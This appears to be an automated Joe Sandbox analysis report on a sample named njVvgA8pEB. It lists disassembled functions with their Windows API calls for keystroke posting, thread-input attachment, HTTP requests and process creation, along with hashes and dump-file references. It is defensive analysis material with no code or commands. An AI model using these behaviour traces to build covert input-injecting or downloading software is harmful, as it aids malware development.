                                                                          Function 003711CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 003711F0
                                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00370268,?,00000001), ref: 00371204
                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 0037120B
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00370268,?,00000001), ref: 0037121A
                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0037122C
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00370268,?,00000001), ref: 00371245
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00370268,?,00000001), ref: 00371257
                                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00370268,?,00000001), ref: 0037129C
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00370268,?,00000001), ref: 003712B1
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00370268,?,00000001), ref: 003712BC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                          • String ID:
                                                                          • API String ID: 2156557900-0
                                                                          • Opcode ID: 175dc962907d5d6641228d4ef6e1470157d050e388187337e74d9984df479050
                                                                          • Instruction ID: e5af8b48f0929b00fd5285ce76bf20a76331df76a2a526227b75a9ee71936628
                                                                          • Opcode Fuzzy Hash: 175dc962907d5d6641228d4ef6e1470157d050e388187337e74d9984df479050
                                                                          • Instruction Fuzzy Hash: 7231DD76601B04BFDB339F58FC89B6A37ADAB54311F218526F818D61A1E7B89D408F60
                                                                          Function 0031FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0031FAA6
                                                                          • OleUninitialize.OLE32(?,00000000), ref: 0031FB45
                                                                          • UnregisterHotKey.USER32(?), ref: 0031FC9C
                                                                          • DestroyWindow.USER32(?), ref: 003545D6
                                                                          • FreeLibrary.KERNEL32(?), ref: 0035463B
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00354668
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                          • String ID: close all
                                                                          • API String ID: 469580280-3243417748
                                                                          • Opcode ID: a30523fd62af317c0b629ca257e822cc840fd9777618a9c5e20ec6427c36a8fa
                                                                          • Instruction ID: 5704803da85a9339a84547bb9c725e4ac1888a770884d82a38b48a130a56669d
                                                                          • Opcode Fuzzy Hash: a30523fd62af317c0b629ca257e822cc840fd9777618a9c5e20ec6427c36a8fa
                                                                          • Instruction Fuzzy Hash: 6FA15C31701212CFCB2EEF14C595FA9F364AF09715F5542ADE80AAB261DB30AD96CF90
                                                                          Function 00389113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearInit$_memset
                                                                          • String ID: ,,:$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                          • API String ID: 2862541840-3363735775
                                                                          • Opcode ID: b483ed7205c69b34c2fb4e30b9cef4342000138ca49c4357b209b2778f1ef44d
                                                                          • Instruction ID: 337c08f85f3def924698998b46b9b517ac3e9945fb66b5116780d6854f724546
                                                                          • Opcode Fuzzy Hash: b483ed7205c69b34c2fb4e30b9cef4342000138ca49c4357b209b2778f1ef44d
                                                                          • Instruction Fuzzy Hash: 18919F71A00319ABDF26EFA5CC48FAEB7B8EF45710F14859AF515AB280D7709941CFA0
                                                                          Function 0036A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • EnumChildWindows.USER32(?,0036A439), ref: 0036A377
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ChildEnumWindows
                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                          • API String ID: 3555792229-1603158881
                                                                          • Opcode ID: 5f27a8e40376f689d1b058292cfab6c3233954ef6e4c0a62280853f199429fdb
                                                                          • Instruction ID: d784d265e5854a3684534242d4a82b0b07c9952030f1b278bdaa834a74e4edbd
                                                                          • Opcode Fuzzy Hash: 5f27a8e40376f689d1b058292cfab6c3233954ef6e4c0a62280853f199429fdb
                                                                          • Instruction Fuzzy Hash: 8A91C731A00A05AACB0ADFA0C492BEDFBB8FF05300F55C519D85ABB255DF316999CF91
                                                                          Function 00312E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowLongW.USER32(?,000000EB), ref: 00312EAE
                                                                            • Part of subcall function 00311DB3: GetClientRect.USER32(?,?), ref: 00311DDC
                                                                            • Part of subcall function 00311DB3: GetWindowRect.USER32(?,?), ref: 00311E1D
                                                                            • Part of subcall function 00311DB3: ScreenToClient.USER32(?,?), ref: 00311E45
                                                                          • GetDC.USER32 ref: 0034CD32
                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0034CD45
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0034CD53
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0034CD68
                                                                          • ReleaseDC.USER32(?,00000000), ref: 0034CD70
                                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0034CDFB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                          • String ID: U
                                                                          • API String ID: 4009187628-3372436214
                                                                          • Opcode ID: ede7a7f9235870b963aca0fe0478a2347f13332c5c7903c07c629b85b895965d
                                                                          • Instruction ID: 3547259613e554091e22f9593a578669b91e2bd9adcbaa73680b8c827a42b3c1
                                                                          • Opcode Fuzzy Hash: ede7a7f9235870b963aca0fe0478a2347f13332c5c7903c07c629b85b895965d
                                                                          • Instruction Fuzzy Hash: 9771F031901205DFCF278F64C880AEA7BB9FF49320F15527AED559E2A6C731AC91DB60
                                                                          Function 00381A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00381A50
                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00381A7C
                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00381ABE
                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00381AD3
                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00381AE0
                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00381B10
                                                                          • InternetCloseHandle.WININET(00000000), ref: 00381B57
                                                                            • Part of subcall function 00382483: GetLastError.KERNEL32(?,?,00381817,00000000,00000000,00000001), ref: 00382498
                                                                            • Part of subcall function 00382483: SetEvent.KERNEL32(?,?,00381817,00000000,00000000,00000001), ref: 003824AD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                          • String ID:
                                                                          • API String ID: 2603140658-3916222277
                                                                          • Opcode ID: 812531b9f543b22d9491084f0e7817e642104a448ba03af8707ae19acb05f36e
                                                                          • Instruction ID: 36e8c6848d63d94dd763e28262f387f579517ef32ecca5009dc0a55266fbb636
                                                                          • Opcode Fuzzy Hash: 812531b9f543b22d9491084f0e7817e642104a448ba03af8707ae19acb05f36e
                                                                          • Instruction Fuzzy Hash: 4F413AB1501319BFEB17AF50CC89FBB7BACEB08354F00816AFA059A141E7759E459BA0
                                                                          Function 00388C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0039F910), ref: 00388D28
                                                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0039F910), ref: 00388D5C
                                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00388ED6
                                                                          • SysFreeString.OLEAUT32(?), ref: 00388F00
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                          • String ID:
                                                                          • API String ID: 560350794-0
                                                                          • Opcode ID: c4b6da5966bda2b1460fbc100c2447120c278974f2e29126e24b188c7c1f3517
                                                                          • Instruction ID: 9805b025240b348a792c0bc29abf7e27f5e4090f0902647273225b560d770301
                                                                          • Opcode Fuzzy Hash: c4b6da5966bda2b1460fbc100c2447120c278974f2e29126e24b188c7c1f3517
                                                                          • Instruction Fuzzy Hash: 28F12871A00209EFCF15EF94C884EAEB7B9FF49314F158499F905AB251DB31AE46CB50
                                                                          Function 0038F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0038F6B5
                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0038F848
                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0038F86C
                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0038F8AC
                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0038F8CE
                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0038FA4A
                                                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0038FA7C
                                                                          • CloseHandle.KERNEL32(?), ref: 0038FAAB
                                                                          • CloseHandle.KERNEL32(?), ref: 0038FB22
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                          • String ID:
                                                                          • API String ID: 4090791747-0
                                                                          • Opcode ID: 12e4565891228a7943f1a34bae2d2facdd14b18f1aaff4ac4fe763019bb11c96
                                                                          • Instruction ID: 7f8c21a0ab1f633d2bb75ed1a4e84cfbd0ce7db29dcf9d06cc5bb0d1b4f27072
                                                                          • Opcode Fuzzy Hash: 12e4565891228a7943f1a34bae2d2facdd14b18f1aaff4ac4fe763019bb11c96
                                                                          • Instruction Fuzzy Hash: C5E190316043009FDB16EF24C891B6ABBE5EF89354F1485ADF8999F2A2CB31DC45CB52
                                                                          Function 00374CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0037466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00373697,?), ref: 0037468B
                                                                            • Part of subcall function 0037466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00373697,?), ref: 003746A4
                                                                            • Part of subcall function 00374A31: GetFileAttributesW.KERNEL32(?,0037370B), ref: 00374A32
                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00374D40
                                                                          • _wcscmp.LIBCMT ref: 00374D5A
                                                                          • MoveFileW.KERNEL32(?,?), ref: 00374D75
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 793581249-0
                                                                          • Opcode ID: 6217b64fcfa3b9370de213c63ab1e8cd5a590208bedda21d302f53131eacc3e7
                                                                          • Instruction ID: 609c76f1cb7233d84d8c4a17662c541326cf06b6e7ddd3d2f37d0c4e397c0f7c
                                                                          • Opcode Fuzzy Hash: 6217b64fcfa3b9370de213c63ab1e8cd5a590208bedda21d302f53131eacc3e7
                                                                          • Instruction Fuzzy Hash: 75513FB20083459BC736DBA0D8819DFB3ECAF85350F00492EF689D7152EF35A688C766
                                                                          Function 00398645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003986FF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: InvalidateRect
                                                                          • String ID:
                                                                          • API String ID: 634782764-0
                                                                          • Opcode ID: a85bf430dfc72adbeb8a67d231e019104c6dffae4139261cfeba68cad1a9f90e
                                                                          • Instruction ID: cfd01353ee5fab84d65b63c02343e969b3e0fd977464fc95ae0b26f79cb400ff
                                                                          • Opcode Fuzzy Hash: a85bf430dfc72adbeb8a67d231e019104c6dffae4139261cfeba68cad1a9f90e
                                                                          • Instruction Fuzzy Hash: 9751C330604244BFEF27AF68DC85FAD7B68EB46350F600116FA55EA5A1CF72E990CB50
                                                                          Function 00312B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0034C2F7
                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0034C319
                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0034C331
                                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0034C34F
                                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0034C370
                                                                          • DestroyIcon.USER32(00000000), ref: 0034C37F
                                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0034C39C
                                                                          • DestroyIcon.USER32(?), ref: 0034C3AB
                                                                            • Part of subcall function 0039A4AF: DeleteObject.GDI32(00000000), ref: 0039A4E8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                          • String ID:
                                                                          • API String ID: 2819616528-0
                                                                          • Opcode ID: e56e74d60b87052b746308814e1cead54b82a2a51dd42eabf4f8509b86d43a1c
                                                                          • Instruction ID: 74373263a0ac970f8396ec445b93fc422fff3fdbc29abc7f68f3ae57344b408d
                                                                          • Opcode Fuzzy Hash: e56e74d60b87052b746308814e1cead54b82a2a51dd42eabf4f8509b86d43a1c
                                                                          • Instruction Fuzzy Hash: 45517A74610209AFDB2ADF64DC45FAB3BF9EB08310F108529F902DB290D7B0ACA0DB50
                                                                          Function 0036966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0036A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0036A84C
                                                                            • Part of subcall function 0036A82C: GetCurrentThreadId.KERNEL32 ref: 0036A853
                                                                            • Part of subcall function 0036A82C: AttachThreadInput.USER32(00000000,?,00369683,?,00000001), ref: 0036A85A
                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0036968E
                                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003696AB
                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 003696AE
                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 003696B7
                                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 003696D5
                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003696D8
                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 003696E1
                                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003696F8
                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003696FB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                          • String ID:
                                                                          • API String ID: 2014098862-0
                                                                          • Opcode ID: 5b96c9762e9083c7c71668241dcc85eeae28f0dd4dc1a629fbafc0f119662bed
                                                                          • Instruction ID: e4bd85d428f1c005d35caef12591f993712b890703053d92d219d8794ebba43b
                                                                          • Opcode Fuzzy Hash: 5b96c9762e9083c7c71668241dcc85eeae28f0dd4dc1a629fbafc0f119662bed
                                                                          • Instruction Fuzzy Hash: 4711CEB1910618BEF7126B64DC89F6A7E2DEB4C760F100426F244AB0A0C9F36C509AE8
                                                                          Function 00368921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0036853C,00000B00,?,?), ref: 0036892A
                                                                          • HeapAlloc.KERNEL32(00000000,?,0036853C,00000B00,?,?), ref: 00368931
                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0036853C,00000B00,?,?), ref: 00368946
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,0036853C,00000B00,?,?), ref: 0036894E
                                                                          • DuplicateHandle.KERNEL32(00000000,?,0036853C,00000B00,?,?), ref: 00368951
                                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0036853C,00000B00,?,?), ref: 00368961
                                                                          • GetCurrentProcess.KERNEL32(0036853C,00000000,?,0036853C,00000B00,?,?), ref: 00368969
                                                                          • DuplicateHandle.KERNEL32(00000000,?,0036853C,00000B00,?,?), ref: 0036896C
                                                                          • CreateThread.KERNEL32(00000000,00000000,00368992,00000000,00000000,00000000), ref: 00368986
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                          • String ID:
                                                                          • API String ID: 1957940570-0
                                                                          • Opcode ID: 6bfecbd91c86077a9ec17e0ef7eddfeb4baa5653e99ce661322898f67371aabb
                                                                          • Instruction ID: 2c44808c3e8e5d3475cdd434c75d7813ff120ba4c5e977b41783c948aca604a6
                                                                          • Opcode Fuzzy Hash: 6bfecbd91c86077a9ec17e0ef7eddfeb4baa5653e99ce661322898f67371aabb
                                                                          • Instruction Fuzzy Hash: 0601BBB5240308FFEB11ABA5DC4DF6B3BACEB89711F508422FA05DB1A1CA719800CB64
                                                                          Function 00389B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
